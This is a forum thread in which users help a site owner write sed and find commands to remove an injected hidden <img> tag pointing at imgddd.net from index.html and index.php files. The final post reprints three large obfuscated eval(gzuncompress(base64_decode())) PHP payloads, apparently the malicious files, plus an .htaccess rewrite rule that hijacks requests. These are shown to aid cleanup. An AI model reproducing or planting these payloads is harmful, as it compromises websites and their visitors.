LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - General (https://www.linuxquestions.org/questions/linux-general-1/)
-   -   SED Usage to delete an injection (https://www.linuxquestions.org/questions/linux-general-1/sed-usage-to-delete-an-injection-877663/)

spithakos 04-28-2011 12:07 PM
SED Usage to delete an injection
 
Trying to delete injected code (one line) into multiple .php and .html files of a server with sed command but it seems there is a problem with sed when " and / are included in the string to be deleted.

The string that needs to be deleted is
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16382836">

However the last part of the string (id=########) is not constant (the number is variable) so I used the following:

find /home -type f -iname \index.html\* -o -iname \index.php\* -o -iname \index.html\* -o -iname \index*\*| while read FILE; do sed -i "s|<img heigth="1" width="1" border="0" src="http:\\imgddd.net*">||g" "${FILE}"; done

For some reason it successfuly deleted the injection on .html files but NOT in .php files

Any suggestions?

jschiwal 04-28-2011 01:32 PM
Code:
sed -i "s|<img heigth="1" width="1" border="0" src="http:\\imgddd.net*">||g" "${FILE}"
You are using a shell style wild cards: "net*
To match any character use: .*
The dot matches any character. The * substitutes for any number of the preceding pattern, including zero.
The backslash needs to be escaped, since it is the metacharacter used to escape characters. This means using \\ for each \.

You might want to use: [^"]*
This matches any number of characters which aren't the " character.

Also look at [[:digit:]] or [0-9] to match digits.
[[:digit:]]* for zero or more digits
[[:digit:]][[:digit:]]* for one or more digits.
You can use the option for extended regex expressions and use
[[:digit:]]+ for one or more digits.

Hoever in this particular case:
s|<img[^>]*src=http:\\\\imgddd\.net[^>]*>||g should be enough to contain the entire pattern and prevent false positives if http:\\imgddd.net is unique to the lines you want to remove.

---
Also, if the filenames might contain white space one technique is to use -print0 in find, and | xargs -0 <command> to process the files. Another method is to pipe the output of a list through "tr '\n' '\0'" between find (or cat filelist) and xargs. This is to prevent the "while read FILE" line from reading a filename as two or more arguments.

crts 04-28-2011 01:49 PM
Quote:
Originally Posted by spithakos (Post 4339599)
Trying to delete injected code (one line) into multiple .php and .html files of a server with sed command but it seems there is a problem with sed when " and / are included in the string to be deleted.

The string that needs to be deleted is
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16382836">

However the last part of the string (id=########) is not constant (the number is variable) so I used the following:

find /home -type f -iname \index.html\* -o -iname \index.php\* -o -iname \index.html\* -o -iname \index*\*| while read FILE; do sed -i "s|<img heigth="1" width="1" border="0" src="http:\\imgddd.net*">||g" "${FILE}"; done

For some reason it successfuly deleted the injection on .html files but NOT in .php files

Any suggestions?
Hi,

in your example string you are using
http://

but in your sed-statement you are using backslashes. Is this a typo?

To avoid the double-quote issue you can enclose your sed-statement in single-quotes. Since no variables need to be expanded this should be ok.

[EDIT]
Can you give some examples how the files are named you are searching for? I see backslashes in your find command; some of them might be falsely interpreted as escape sequence and therefore you miss some files.

spithakos 04-28-2011 03:19 PM
Quote:
Originally Posted by crts (Post 4339699)
Hi,

in your example string you are using
http://

but in your sed-statement you are using backslashes. Is this a typo?

To avoid the double-quote issue you can enclose your sed-statement in single-quotes. Since no variables need to be expanded this should be ok.

[EDIT]
Can you give some examples how the files are named you are searching for? I see backslashes in your find command; some of them might be falsely interpreted as escape sequence and therefore you miss some files.

Thanks for your reply,
Yes it is a typo http:// is the one that used in the sed command allready without success.
The injection is found in index.html and index.php files in user accounts.

spithakos 04-28-2011 03:33 PM
Quote:
Originally Posted by jschiwal (Post 4339680)
Code:
sed -i "s|<img heigth="1" width="1" border="0" src="http:\\imgddd.net*">||g" "${FILE}"
You are using a shell style wild cards: "net*
To match any character use: .*
The dot matches any character. The * substitutes for any number of the preceding pattern, including zero.
The backslash needs to be escaped, since it is the metacharacter used to escape characters. This means using \\ for each \.

You might want to use: [^"]*
This matches any number of characters which aren't the " character.

Also look at [[:digit:]] or [0-9] to match digits.
[[:digit:]]* for zero or more digits
[[:digit:]][[:digit:]]* for one or more digits.
You can use the option for extended regex expressions and use
[[:digit:]]+ for one or more digits.

Hoever in this particular case:
s|<img[^>]*src=http:\\\\imgddd\.net[^>]*>||g should be enough to contain the entire pattern and prevent false positives if http:\\imgddd.net is unique to the lines you want to remove.

---
Also, if the filenames might contain white space one technique is to use -print0 in find, and | xargs -0 <command> to process the files. Another method is to pipe the output of a list through "tr '\n' '\0'" between find (or cat filelist) and xargs. This is to prevent the "while read FILE" line from reading a filename as two or more arguments.

Thanks for your reply
By mistake I used backslashes and not slashes in this post while the string used in the sed was http://imgddd.net and not http:\\imgddd.net without success.
Does the slash needs to be escaped also?

Yes the http://imgddd.net is unique to all injections so using s|<img[^>]*src=http:\\\\imgddd\.net[^>]*>||g (with the appropriate corrections for slashes and not backslashes) will delete the line?

crts 04-28-2011 03:50 PM
As I mentioned earlier, your find command is probably flawed. Try this
Code:
find /home -type f \( -iname index.html -o -iname index.php \) -exec sed -i 's|<img heigth="1" width="1" border="0" src="http://imgddd.net*">||g' '{}' \;
I assume that you only want to change files that are either named index.html or index.php.

jschiwal 04-28-2011 06:02 PM
If you used forward slashes as a separator in the sed commands, you would need to escape the slashes in the expressions; however you used `|' instead to avoid that problem. So in this example you don't need to escape forward slashes.

Using sed, it can be a trick to identify what the matching patterns will be that won't produce false positives. Sometimes you need 2 or more commands to cover border cases as well.

Good Luck.

spithakos 04-29-2011 02:32 AM
The following worked finally
Code:
find /home/ -type f \( -iname index.html -o -iname index.php \) | while read FILE; do sed -i "s|<img[^>]*imgddd\.net[^>]*>||g" "${FILE}"; done
Thank you both for your valuable assistance

darshanmm 05-03-2011 09:30 AM
Hello guys,

those who are facing problem with that virus, pls check their hosting account for some malicious files specifically 2 php files with some different names. it contains code like this :
Code:
<? eval(gzuncompress(base64_decode('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'))); ?><? eval(gzuncompress(base64_decode('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'))); ?><? eval(gzuncompress(base64_decode('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'))); ?>
Also try to check .htaccess file which will be like this :
Code:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /pets.php?q=$1 [L]
</IfModule>
It is very possible that there will be some different php file name instead of pets.php. so remove all those messy stuff from your hosting and you will good to go from there.

Thanks,
Dev


All times are GMT -5. The time now is 07:53 AM.